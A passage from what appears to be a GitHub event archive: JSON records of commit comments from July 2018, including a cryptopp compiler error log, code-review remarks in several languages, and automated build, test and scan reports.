simeck-simd.cpp:13:\r\n/usr/lib/gcc/x86_64-redhat-linux/8/include/tmmintrin.h: In function ‘__m128i {anonymous}::UnpackXMM(const __m128i&, const __m128i&, const __m128i&, const __m128i&) [with unsigned int IDX = 0]’:\r\n/usr/lib/gcc/x86_64-redhat-linux/8/include/tmmintrin.h:136:1: error: inlining failed in call to always_inline ‘__m128i _mm_shuffle_epi8(__m128i, __m128i)’: target specific option mismatch\r\n _mm_shuffle_epi8 (__m128i __X, __m128i __Y)\r\n ^~~~~~~~~~~~~~~~\r\nsimeck-simd.cpp:94:28: note: called from here\r\n     return _mm_shuffle_epi8(_mm_unpacklo_epi64(r1, r2),\r\n            ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n         _mm_set_epi8(12,13,14,15, 8,9,10,11, 4,5,6,7, 0,1,2,3));\r\n         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nIn file included from /usr/lib/gcc/x86_64-redhat-linux/8/include/immintrin.h:35,\r\n                 from adv-simd.h:47,\r\n                 from simeck-simd.cpp:13:\r\n/usr/lib/gcc/x86_64-redhat-linux/8/include/tmmintrin.h:136:1: error: inlining failed in call to always_inline ‘__m128i _mm_shuffle_epi8(__m128i, __m128i)’: target specific option mismatch\r\n _mm_shuffle_epi8 (__m128i __X, __m128i __Y)\r\n ^~~~~~~~~~~~~~~~\r\nsimeck-simd.cpp:94:28: note: called from here\r\n     return _mm_shuffle_epi8(_mm_unpacklo_epi64(r1, r2),\r\n            ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n         _mm_set_epi8(12,13,14,15, 8,9,10,11, 4,5,6,7, 0,1,2,3));\r\n         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nmake[1]: *** [Makefile:1309: simeck-simd.lo] Error 1\r\nmake[1]: Leaving directory '/home/jwalton/cryptopp'\r\nmake: *** [Makefile:884: all] Error 2\r\n```\r\n\r\nSIMECK was added like the other files that needed arch flags (such as `lea-simd.cpp` and `simon-simd.cpp`), and I am not sure what is wrong."}},"created_at":"2018-07-01T09:47:39Z"}
{"id":"7902756529","type":"CommitCommentEvent","actor":{"login":"roogeorgia"},"repo":{"name":"roogeorgia/website"},"payload":{"comment":{"id":29557302,"position":null,"line":null,"path":null,"commit_id":"cdd3e394ac2a982b32281be160f48723d6583bd2","created_at":"2018-07-01T09:48:03Z","updated_at":"2018-07-01T09:48:03Z","author_association":"OWNER","body":"# Master \r\n"}},"created_at":"2018-07-01T09:48:03Z"}
{"id":"7902756918","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"kconrado/kkowalski_2nd_repository"},"payload":{"comment":{"id":29557303,"position":21,"line":21,"path":"src/main/java/com/crud/tasks/domain/ExtraTrelloCard.java","commit_id":"eb3da4cdaf8dc61e016ec4355110d0a9b93d31a1","created_at":"2018-07-01T09:48:22Z","updated_at":"2018-07-01T09:48:22Z","author_association":"NONE","body":"W klasie powinno być tylko id i badges, reszta jest zagnieżdżona w badges"}},"created_at":"2018-07-01T09:48:22Z"}
{"id":"7902757004","type":"CommitCommentEvent","actor":{"login":"sroze"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":29557304,"position":null,"line":null,"path":null,"commit_id":"9efa5551910a0389644bde012db300a82ecb75a7","created_at":"2018-07-01T09:48:26Z","updated_at":"2018-07-01T09:48:26Z","author_association":"MEMBER","body":"How did that even got here 😛 "}},"created_at":"2018-07-01T09:48:26Z"}
{"id":"7902760288","type":"CommitCommentEvent","actor":{"login":"Piruzzolo"},"repo":{"name":"yvan-burrie/Genie-Reverse"},"payload":{"comment":{"id":29557306,"position":1,"line":1,"path":"src/Engine/RGE/CommServices.hpp","commit_id":"9134471eb0ed0b28ee416edf061f445a96390d5f","created_at":"2018-07-01T09:51:09Z","updated_at":"2018-07-01T09:51:09Z","author_association":"NONE","body":"In thiscall routines we can omit the first parameter"}},"created_at":"2018-07-01T09:51:09Z"}
{"id":"7902763419","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"miningpoolhub/php-mpos"},"payload":{"comment":{"id":29557314,"position":null,"line":null,"path":null,"commit_id":"aad69a957f89f27ab1c8c2611c9b8eb485045699","created_at":"2018-07-01T09:53:52Z","updated_at":"2018-07-01T09:53:52Z","author_association":"NONE","body":"aad69a9"}},"created_at":"2018-07-01T09:53:52Z"}
{"id":"7902763427","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29557315,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-01T09:53:52Z","updated_at":"2018-07-01T09:53:52Z","author_association":"OWNER","body":"Checkmarx scan results 01 Jul 2018 12:53 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016TEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1000010&projectid=11\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-01T09:53:52Z"}
{"id":"7902764007","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29557320,"position":null,"line":null,"path":null,"commit_id":"c121d53cf33b9ff1dafaf60a4e7f0b2fcb16b294","created_at":"2018-07-01T09:54:24Z","updated_at":"2018-07-01T09:54:24Z","author_association":"OWNER","body":"In the examples I tested, SF detect blocked position at depths 30 or more. I just wanted to see if there is a big difference between STC and LTC. Until now I still have some problems because of this problem of depths. Even if SF detectes blocked position, it is too late and it can't avoid it in short times.\r\nI am trying to find a new idea to improve the actual commit."}},"created_at":"2018-07-01T09:54:24Z"}
{"id":"7902767636","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"MPOS/php-mpos"},"payload":{"comment":{"id":29557323,"position":null,"line":null,"path":null,"commit_id":"64c5c99cfe6208baa730742a77b553b23f72ae4b","created_at":"2018-07-01T09:57:22Z","updated_at":"2018-07-01T09:57:22Z","author_association":"NONE","body":"64c5c99"}},"created_at":"2018-07-01T09:57:22Z"}
{"id":"7902769395","type":"CommitCommentEvent","actor":{"login":"Kaixhin"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29557324,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T09:58:51Z","updated_at":"2018-07-01T09:58:51Z","author_association":"OWNER","body":"At the moment the variance is too high to make conclusions on whether the trust region is necessary or not. Here's a run without trust region from a while ago, and it looks a lot better than any of the runs here.\r\n\r\n![ACER](https://raw.githubusercontent.com/Kaixhin/ACER/master/figures/acer.png)\r\n\r\nIt'd be great to change the sign of the KL divergence if it is wrong, but I would recommend that you do several runs to check what is going on. For trust regions in particular, preventing the policy from changing too much should *reduce variance*, **not** necessarily *improve performance* - policy gradients improve performance, trust region constraints prevent performance from changing drastically."}},"created_at":"2018-07-01T09:58:51Z"}
{"id":"7902770087","type":"CommitCommentEvent","actor":{"login":"ndzemaruna"},"repo":{"name":"ndzemaruna/java-ee-8"},"payload":{"comment":{"id":29557325,"position":null,"line":null,"path":null,"commit_id":"53b06ef60be8d888fa13a3f4b1bccd6f65baccc3","created_at":"2018-07-01T09:59:31Z","updated_at":"2018-07-01T09:59:31Z","author_association":"OWNER","body":"This is just a trial commit"}},"created_at":"2018-07-01T09:59:31Z"}
{"id":"7903903437","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29559976,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-02T00:00:47Z","updated_at":"2018-07-02T00:00:47Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2921 of 2929 tests passed, 165 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 155 tests had: BND diffs.\n * 34 tests had: RDD diffs.\n * 5 tests had: MDD diffs.\n * 8 tests had: MTD diffs.\n * 5 tests had: Table big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 622\n * Failed: 3\n\nregression Test Summary\n * Passed: 618\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T00:00:47Z"}
{"id":"7903903709","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29559979,"position":23,"line":4825,"path":"src/map/lua/lua_baseentity.cpp","commit_id":"22d6a6208de337bb126019ff4a9b6addb1b2d776","created_at":"2018-07-02T00:00:59Z","updated_at":"2018-07-02T00:00:59Z","author_association":"MEMBER","body":"see the change in battleentity.cpp"}},"created_at":"2018-07-02T00:00:59Z"}
{"id":"7903904247","type":"CommitCommentEvent","actor":{"login":"theautistic9"},"repo":{"name":"theautistic9/downInIt"},"payload":{"comment":{"id":29559980,"position":null,"line":null,"path":null,"commit_id":"b9004a04466cd5088ad91c349cffe3f29dd35b06","created_at":"2018-07-02T00:01:20Z","updated_at":"2018-07-02T00:01:20Z","author_association":"OWNER","body":"downInIt"}},"created_at":"2018-07-02T00:01:20Z"}
{"id":"7903906491","type":"CommitCommentEvent","actor":{"login":"g-plane"},"repo":{"name":"cherow/cherow"},"payload":{"comment":{"id":29559983,"position":null,"line":null,"path":null,"commit_id":"2d72e7ca106143a0fe8cd9e1b127eabae0696b81","created_at":"2018-07-02T00:02:52Z","updated_at":"2018-07-02T00:02:52Z","author_association":"MEMBER","body":"This commit message does not conform the conventional commit message."}},"created_at":"2018-07-02T00:02:52Z"}
{"id":"7903908023","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29559985,"position":null,"line":null,"path":null,"commit_id":"bbee0cdba19ea699382c290b13592b78e25b3ad7","created_at":"2018-07-02T00:03:59Z","updated_at":"2018-07-02T00:03:59Z","author_association":"MEMBER","body":"#1097"}},"created_at":"2018-07-02T00:03:59Z"}
{"id":"7903910535","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29559990,"position":23,"line":4825,"path":"src/map/lua/lua_baseentity.cpp","commit_id":"22d6a6208de337bb126019ff4a9b6addb1b2d776","created_at":"2018-07-02T00:05:47Z","updated_at":"2018-07-02T00:05:47Z","author_association":"MEMBER","body":"still temped to rename function here because it now isn't directly what it says anymore : calling the function without one of those status = this function does no restricting. "}},"created_at":"2018-07-02T00:05:47Z"}
{"id":"7903911481","type":"CommitCommentEvent","actor":{"login":"Chokolove"},"repo":{"name":"Chokolove/lp2"},"payload":{"comment":{"id":29559991,"position":200,"line":200,"path":"WebContent/entidadCRUD.jsp","commit_id":"0cafffc8202d6dbfafcd1ae9c4320d9af0251d67","created_at":"2018-07-02T00:06:29Z","updated_at":"2018-07-02T00:06:29Z","author_association":"OWNER","body":"Corrige la identacion\r\n"}},"created_at":"2018-07-02T00:06:29Z"}
{"id":"7903912004","type":"CommitCommentEvent","actor":{"login":"Chokolove"},"repo":{"name":"Chokolove/lp2"},"payload":{"comment":{"id":29559992,"position":211,"line":211,"path":"WebContent/entidadCRUD.jsp","commit_id":"0cafffc8202d6dbfafcd1ae9c4320d9af0251d67","created_at":"2018-07-02T00:06:54Z","updated_at":"2018-07-02T00:06:54Z","author_association":"OWNER","body":"No dejes codigo en comentarios, usalo o eliminalo"}},"created_at":"2018-07-02T00:06:54Z"}
{"id":"7903912254","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"netrunner-rolling/PKGBUILD-netrunner-common"},"payload":{"comment":{"id":29559993,"position":null,"line":null,"path":null,"commit_id":"13bdc6ddabacc6f8b293224edf6ff2bac9797719","created_at":"2018-07-02T00:07:08Z","updated_at":"2018-07-02T00:07:08Z","author_association":"CONTRIBUTOR","body":"I meant kwin4_effect_scaleinEnabled not kwin4_effect_maximizeEnabled."}},"created_at":"2018-07-02T00:07:08Z"}
{"id":"7903914617","type":"CommitCommentEvent","actor":{"login":"mictadlo"},"repo":{"name":"wurmlab/sequenceserver"},"payload":{"comment":{"id":29559997,"position":8,"line":8,"path":"Dockerfile","commit_id":"e3df71c72dab36327053ba5337c9c4e47beb771f","created_at":"2018-07-02T00:08:58Z","updated_at":"2018-07-02T00:08:58Z","author_association":"NONE","body":"it is duplication to the top line"}},"created_at":"2018-07-02T00:08:58Z"}
{"id":"7903914681","type":"CommitCommentEvent","actor":{"login":"ruped24"},"repo":{"name":"ruped24/toriptables2"},"payload":{"comment":{"id":29559998,"position":null,"line":null,"path":null,"commit_id":"6c2f9a339137e719c6b23db867815c9e8f931245","created_at":"2018-07-02T00:09:01Z","updated_at":"2018-07-02T00:09:01Z","author_association":"OWNER","body":"IP lookup benchmark [script](https://gist.github.com/ruped24/a3db44c49f1da82ad4adeb48de6aaea0) --  Jsonip vs. Identme"}},"created_at":"2018-07-02T00:09:01Z"}
{"id":"7903915774","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29560001,"position":null,"line":null,"path":null,"commit_id":"e47b23be2f7c7fe36a3a3da7adf4bb91d3c501e1","created_at":"2018-07-02T00:09:53Z","updated_at":"2018-07-02T00:09:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Интерфейс: появление окна с информацией о системе при клике на систему.](https://trello.com/c/meBa5zFV/20-%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D1%84%D0%B5%D0%B9%D1%81-%D0%BF%D0%BE%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D0%BA%D0%BD%D0%B0-%D1%81-%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%B5%D0%B9-%D0%BE-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B5-%D0%BF%D1%80%D0%B8-%D0%BA%D0%BB%D0%B8%D0%BA%D0%B5-%D0%BD%D0%B0-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%83)"}},"created_at":"2018-07-02T00:09:53Z"}
{"id":"7903919155","type":"CommitCommentEvent","actor":{"login":"mictadlo"},"repo":{"name":"wurmlab/sequenceserver"},"payload":{"comment":{"id":29560007,"position":23,"line":23,"path":"Dockerfile","commit_id":"e3df71c72dab36327053ba5337c9c4e47beb771f","created_at":"2018-07-02T00:12:24Z","updated_at":"2018-07-02T00:12:24Z","author_association":"NONE","body":"Do you need to do `mkdir /db` first?"}},"created_at":"2018-07-02T00:12:24Z"}
{"id":"7903920617","type":"CommitCommentEvent","actor":{"login":"cmrauch"},"repo":{"name":"cmrauch/iVoteService"},"payload":{"comment":{"id":29560012,"position":65,"line":58,"path":"SimulationDriver.java","commit_id":"252eb80e74114353cf9b00cdb0fd6a47c80bc96c","created_at":"2018-07-02T00:13:28Z","updated_at":"2018-07-02T00:13:28Z","author_association":"OWNER","body":"runtime error: q cannot be resolved to a variable\r\n"}},"created_at":"2018-07-02T00:13:28Z"}
{"id":"7903925413","type":"CommitCommentEvent","actor":{"login":"ronf"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29560026,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-02T00:16:59Z","updated_at":"2018-07-02T00:16:59Z","author_association":"OWNER","body":"Good idea. I should probably move that code to util, to make it available to multiple test cases. I'm traveling this week, but I'll try and get this into a patch release soon."}},"created_at":"2018-07-02T00:16:59Z"}
{"id":"7903925460","type":"CommitCommentEvent","actor":{"login":"KFlash"},"repo":{"name":"cherow/cherow"},"payload":{"comment":{"id":29560027,"position":null,"line":null,"path":null,"commit_id":"2d72e7ca106143a0fe8cd9e1b127eabae0696b81","created_at":"2018-07-02T00:17:01Z","updated_at":"2018-07-02T00:17:01Z","author_association":"MEMBER","body":"Use cherow instead of lexer ?"}},"created_at":"2018-07-02T00:17:01Z"}
{"id":"7903926779","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29560033,"position":23,"line":4825,"path":"src/map/lua/lua_baseentity.cpp","commit_id":"22d6a6208de337bb126019ff4a9b6addb1b2d776","created_at":"2018-07-02T00:18:05Z","updated_at":"2018-07-02T00:18:05Z","author_association":"MEMBER","body":"that's true - we can just remove it and replace it with recalculateStats\n(which exists already)\n\nOn Sun, Jul 1, 2018 at 6:05 PM TeoTwawki <notifications@github.com> wrote:\n\n> still temped to rename function here because it now isn't directly what it\n> says anymore : calling the function without one of those status = this\n> function does no restricting.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DarkstarProject/darkstar/commit/22d6a6208de337bb126019ff4a9b6addb1b2d776#commitcomment-29559990>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABGI_-g_XNC5EQlGIEardTGcTfSenfQkks5uCWPbgaJpZM4U-hOH>\n> .\n>\n"}},"created_at":"2018-07-02T00:18:05Z"}
{"id":"7903928429","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29560035,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-02T00:19:18Z","updated_at":"2018-07-02T00:19:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T00:19:18Z"}
{"id":"7903928571","type":"CommitCommentEvent","actor":{"login":"retronym"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29560036,"position":46,"line":371,"path":"src/compiler/scala/tools/nsc/typechecker/SyntheticMethods.scala","commit_id":"8d111b612f3cbfc4d3769a5c470829bfe7fcdfea","created_at":"2018-07-02T00:19:26Z","updated_at":"2018-07-02T00:19:26Z","author_association":"MEMBER","body":"Given that the module class is final, can't we just use a class literal (`gen.mkClassOf`) rather than a call to `getClass`?\r\n\r\n```\r\n$ scala\r\nWelcome to Scala 2.12.4 (Java HotSpot(TM) 64-Bit Server VM, Java 1.8.0_172).\r\nType in expressions for evaluation. Or try :help.\r\n\r\nscala> import scala.tools.reflect.ToolBox; val m = scala.reflect.runtime.currentMirror; val u = m.universe; import u._; val tb = m.mkToolBox()\r\nimport scala.tools.reflect.ToolBox\r\nm: reflect.runtime.universe.Mirror = JavaMirror with scala.tools.nsc.interpreter.IMain$TranslatingClassLoader@1a411233 of type class scala.tools.nsc.interpreter.IMain$TranslatingClassLoader with classpath [(memory)] and parent being scala.reflect.internal.util.ScalaClassLoader$URLClassLoader@2e766822 of type class scala.reflect.internal.util.ScalaClassLoader$URLClassLoader with classpath [file:/Users/jz/.jabba/jdk/1.8.172/Contents/Home/jre/lib/resources.jar,file:/Users/jz/.jabba/jdk/1.8.172/Contents/Home/jre/lib/rt.jar,file:/Users/jz/.jabba/jdk/1.8.172/Contents/Home/jre/lib/jsse.jar,file:/Users/jz/.jabba/jdk/1.8.172/Contents/Home/jre/lib/jce.jar,file:/Users/jz/.jabba/jdk/1.8.172/Contents/Home/jre/lib/charsets.jar,file:/Users/j...\r\n\r\nscala> val tp = typeOf[Nil.type]; tb.eval(Literal(Constant(tp))) \r\ntp: u.Type = scala.collection.immutable.Nil.type\r\nres0: Any = class scala.collection.immutable.Nil$\r\n```"}},"created_at":"2018-07-02T00:19:26Z"}
{"id":"7903943094","type":"CommitCommentEvent","actor":{"login":"GustavoKikey"},"repo":{"name":"pdroaugust/waytickets"},"payload":{"comment":{"id":29560060,"position":21,"line":10,"path":"desenha/desenha_palco.c","commit_id":"8713212555d3ea3c3c6848c08d15612ac31a68fd","created_at":"2018-07-02T00:30:54Z","updated_at":"2018-07-02T00:30:54Z","author_association":"COLLABORATOR","body":"Rapaz, o palco vai ficar assim até acharmos uma solução boa HHAHAHAHHAHA"}},"created_at":"2018-07-02T00:30:54Z"}
{"id":"7903944660","type":"CommitCommentEvent","actor":{"login":"GustavoKikey"},"repo":{"name":"pdroaugust/waytickets"},"payload":{"comment":{"id":29560064,"position":null,"line":null,"path":null,"commit_id":"8713212555d3ea3c3c6848c08d15612ac31a68fd","created_at":"2018-07-02T00:31:55Z","updated_at":"2018-07-02T00:31:55Z","author_association":"COLLABORATOR","body":"O palco vai ficar desse jeito até acharmos algo que substitua ele e que não dê um bug do capiroto hahahahahhaha"}},"created_at":"2018-07-02T00:31:55Z"}
{"id":"7903945618","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29560068,"position":40,"line":40,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-02T00:32:34Z","updated_at":"2018-07-02T00:32:34Z","author_association":"COLLABORATOR","body":"Falta un punto final"}},"created_at":"2018-07-02T00:32:34Z"}
{"id":"7903947048","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29560076,"position":6,"line":6,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-02T00:33:41Z","updated_at":"2018-07-02T00:33:41Z","author_association":"COLLABORATOR","body":"Se escribe sobre el primer hecho del predicado."}},"created_at":"2018-07-02T00:33:41Z"}
{"id":"7903948619","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29560079,"position":10,"line":10,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-02T00:34:54Z","updated_at":"2018-07-02T00:34:54Z","author_association":"COLLABORATOR","body":"También necesita un discontiguous. Sobre la línea 10, de esta forma\r\n:- discontiguous(trabajaPara/2).\r\n"}},"created_at":"2018-07-02T00:34:54Z"}
{"id":"7903949106","type":"CommitCommentEvent","actor":{"login":"biggydrink"},"repo":{"name":"biggydrink/udemy_webdev_travel_site"},"payload":{"comment":{"id":29560084,"position":8,"line":7,"path":"app/assets/styles/modules/_generic-content-container.css","commit_id":"883123680229fe1ed7b4e47d153dd64cce415fcf","created_at":"2018-07-02T00:35:14Z","updated_at":"2018-07-02T00:35:14Z","author_association":"OWNER","body":"Trying out a comment"}},"created_at":"2018-07-02T00:35:14Z"}
{"id":"7903953168","type":"CommitCommentEvent","actor":{"login":"LexiconCode"},"repo":{"name":"synkarius/caster"},"payload":{"comment":{"id":29560085,"position":null,"line":null,"path":null,"commit_id":"32a2da6a6c492ad69c870b8be20661617ca68071","created_at":"2018-07-02T00:38:03Z","updated_at":"2018-07-02T00:38:03Z","author_association":"COLLABORATOR","body":"This reverts accidentally commit to upstream repository."}},"created_at":"2018-07-02T00:38:03Z"}
{"id":"7903956027","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29560087,"position":63,"line":63,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-02T00:40:03Z","updated_at":"2018-07-02T00:40:03Z","author_association":"COLLABORATOR","body":"Cuando compila el programa, aparece la advertencia:\r\nWarning:  Singleton variables: [Alguien]\r\nDesaparece si se instancia \"Alguien\"\r\n"}},"created_at":"2018-07-02T00:40:03Z"}
{"id":"7903959376","type":"CommitCommentEvent","actor":{"login":"asottile"},"repo":{"name":"jaywinky/pre-commit-hooks"},"payload":{"comment":{"id":29560092,"position":null,"line":null,"path":null,"commit_id":"d59d3511d495fafda4c1385e913c18212de3a484","created_at":"2018-07-02T00:42:29Z","updated_at":"2018-07-02T00:42:29Z","author_association":"NONE","body":"You might find [this](https://github.com/asottile/reorder_python_imports#adding--removing-imports) useful :)"}},"created_at":"2018-07-02T00:42:29Z"}
{"id":"7903964783","type":"CommitCommentEvent","actor":{"login":"2348"},"repo":{"name":"mozilla/contain-facebook"},"payload":{"comment":{"id":29560099,"position":42,"line":46,"path":"background.js","commit_id":"ed6f9753c267879e6128b0f19b12bd483529f996","created_at":"2018-07-02T00:46:28Z","updated_at":"2018-07-02T00:46:28Z","author_association":"NONE","body":"Break up"}},"created_at":"2018-07-02T00:46:28Z"}
{"id":"7903964873","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29560100,"position":null,"line":null,"path":null,"commit_id":"33be3c1c49a4db28393334c1c655d70a25a810fe","created_at":"2018-07-02T00:46:32Z","updated_at":"2018-07-02T00:46:32Z","author_association":"OWNER","body":"LLR: 0.35 (-2.94,2.94) [0.00,5.00]\r\nTotal: 2313 W: 527 L: 500 D: 1286"}},"created_at":"2018-07-02T00:46:32Z"}
{"id":"7903965342","type":"CommitCommentEvent","actor":{"login":"FiveBoroughs"},"repo":{"name":"FiveBoroughs/Natalia"},"payload":{"comment":{"id":29560101,"position":null,"line":null,"path":null,"commit_id":"00fe730b20a7b0c57ff12fed4d2ef8eeddcda94d","created_at":"2018-07-02T00:46:52Z","updated_at":"2018-07-02T00:46:52Z","author_association":"OWNER","body":"This refactorisation allows for rooms to be set in the config file as objects.\r\nInstead of in the code.\r\n\r\nThis will allow for the bot to easily be added to new rooms and to be independant from any whalepool specific room structure.\r\n\r\nThis is v1 where I've mostly worked on new users join\r\n\r\nAlso general indentation and code cleanup + updated requirements for pip"}},"created_at":"2018-07-02T00:46:52Z"}
{"id":"7903966778","type":"CommitCommentEvent","actor":{"login":"dlm95"},"repo":{"name":"dlm95/Highlight-Portfolio"},"payload":{"comment":{"id":29560106,"position":null,"line":null,"path":null,"commit_id":"78d01c561b338f6d6c73e4a8fd9c782950877291","created_at":"2018-07-02T00:47:54Z","updated_at":"2018-07-02T00:47:54Z","author_association":"OWNER","body":"Person Highlight"}},"created_at":"2018-07-02T00:47:54Z"}
{"id":"7903970327","type":"CommitCommentEvent","actor":{"login":"onovotny"},"repo":{"name":"xunit/xunit"},"payload":{"comment":{"id":29560115,"position":34,"line":61,"path":"src/xunit.runner.utility/xunit.runner.utility.csproj","commit_id":"30e98e1fa8f2ac184c8df9d1f57f791768b0014c","created_at":"2018-07-02T00:49:46Z","updated_at":"2018-07-02T00:49:46Z","author_association":"MEMBER","body":"I don't think you need this reference anymore, should be included?"}},"created_at":"2018-07-02T00:49:46Z"}
{"id":"7903970885","type":"CommitCommentEvent","actor":{"login":"verbart"},"repo":{"name":"leonziger/ayu-dag"},"payload":{"comment":{"id":29560118,"position":6,"line":24,"path":"src/components/button/button.scss","commit_id":"5f559a2e5a341010f26d65bf181fd8520d42dbde","created_at":"2018-07-02T00:50:10Z","updated_at":"2018-07-02T00:50:10Z","author_association":"CONTRIBUTOR","body":"У компонента \"кнопка\" не должно быть отступа слева"}},"created_at":"2018-07-02T00:50:10Z"}
